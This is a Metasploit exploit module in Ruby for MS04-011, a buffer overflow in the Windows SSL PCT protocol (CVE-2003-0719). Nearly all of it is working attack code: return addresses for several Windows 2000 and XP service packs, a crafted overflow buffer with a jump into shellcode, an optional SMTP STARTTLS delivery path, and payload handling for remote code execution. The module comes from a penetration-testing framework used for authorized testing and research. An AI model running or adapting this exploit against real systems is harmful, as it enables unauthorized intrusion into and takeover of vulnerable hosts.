MS04-011 Microsoft Private Communications Transport Overflow

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'MS04-011 Microsoft Private Communications Transport Overflow',
      'Description'    => %q{
          This module exploits a buffer overflow in the Microsoft
        Windows SSL PCT protocol stack. This code is based on Johnny
        Cyberpunk's THC release and has been tested against Windows
        2000 and Windows XP. To use this module, specify the remote
        port of any SSL service, or the port and protocol of an
        application that uses SSL. The only application protocol
        supported at this time is SMTP. You only have one chance to
        select the correct target, if you are attacking IIS, you may
        want to try one of the other exploits first (WebDAV). If
        WebDAV does not work, this more than likely means that this
        is either Windows 2000 SP4+ or Windows XP (IIS 5.0 vs IIS
        5.1). Using the wrong target may not result in an immediate
        crash of the remote system.
      },
      'Author'         => [ 'hdm' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2003-0719'],
          [ 'OSVDB', '5250'],
          [ 'BID', '10116'],
          [ 'MSB', 'MS04-011'],

        ],
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space'    => 1800,
          'BadChars' => "",
          'StackAdjustment' => -3500,
        },
      'Platform' => 'win',
      'Targets'        =>
        [
          [
            'Windows 2000 SP4',
            {
              'Platform' => 'win',
              'Ret'      => 0x67419ce8, # jmp [esp + 0x6c]
            },
          ],
          [
            'Windows 2000 SP3',
            {
              'Platform' => 'win',
              'Ret'      => 0x67419e1d, # jmp [esp + 0x6c]
            },
          ],
          [
            'Windows 2000 SP2',
            {
              'Platform' => 'win',
              'Ret'      => 0x6741a426, # jmp [esp + 0x6c]
            },
          ],
          [
            'Windows 2000 SP1',
            {
              'Platform' => 'win',
              'Ret'      => 0x77e4f44d, # jmp [ebx + 0x14]
            },
          ],
          [
            'Windows 2000 SP0',
            {
              'Platform' => 'win',
              'Ret'      => 0x7658a6cb, # jmp [ebx + 0x0e]
            },
          ],
          [
            'Windows XP SP0',
            {
              'Platform' => 'win',
              'Ret'      => 0x0ffb7de9, # jmp [esp + 0x6c]
            },
          ],
          [
            'Windows XP SP1',
            {
              'Platform' => 'win',
              'Ret'      => 0x0ffb832f, # jmp [esp + 0x6c]
            },
          ],
        ],
      'DisclosureDate' => '2004-04-13',
      'DefaultTarget' => 0))

    register_options(
      [
        OptString.new('PROTO', [true, "The application protocol: raw or smtp", "raw"])
      ])
  end

  def exploit
    begin
      connect
    rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused => e
      print_error("Cannot connect: #{e.message}")
      return
    end

    print_status("Trying target #{target.name} with proto #{datastore['PROTO']}...")

    # This is a heap ptr to the ssl request
    # ... and just happens to not die ...
    # Thanks to CORE and Halvar
    #
    #   80620101     =>  and byte ptr [esi+1], 0x2
    #   bd00010001   =>  mov ebp, 0x1000100
    #   0016         =>  add [esi], dl
    #   8f8201000000 =>  pop [esi+1]
    #   eb0f         =>  jmp short 11 to shellcode

    buf = "\x80\x66\x01\x02\xbd\x00\x01\x00\x01\x00\x16\x8f\x86\x01\x00\x00\x00"+
      "\xeb\x0f" + 'XXXXXXXXXXX' +
      [target.ret ^ 0xffffffff].pack('V')+
      payload.encoded

    # Connect to a SMTP service, call STARTTLS
    if (datastore['PROTO'] == 'smtp')
      begin
        greeting = sock.get_once
      rescue ::EOFError => e
        print_error("Failed to receive data for the protocol greeting: #{e.message}")
        return
      end

      begin
        sock.put('HELO ' + (rand_text_alphanumeric(rand(10)+1)) + "\r\n")
        resp = sock.get_once
      rescue ::Timeout::Error
        print_error("Timedout while sending HELO")
        return
      rescue ::EOFError => e
        print_error("Failed to receive a response for HELO: #{e.message}")
        return
      end

      begin
        sock.put("STARTTLS\r\n")
        resp = sock.get_once
      rescue ::Timeout::Error
        print_error("Timed out while sending STARTTLS")
        return
      rescue ::EOFError => e
        print_error("Failed to receive a response for STARTTLS: #{e.message}")
        return
      end

      if (resp and resp !~ /^220/)
        print_warning("Warning: this server may not support STARTTLS")
      end
    end


    begin
      sock.put(buf)
      resp = sock.get_once
    rescue ::Timeout::Error => e
      print_error("Timed out while sending the malicious data")
      return
    rescue ::EOFError => e
      print_error("Failed to receive a response after the malicious data: #{e.message}")
      return
    end

    if (resp == "\x00\x00\x01")
      print_status("The response indicates that the PCT protocol is disabled")
    end

    handler
    disconnect
  end
end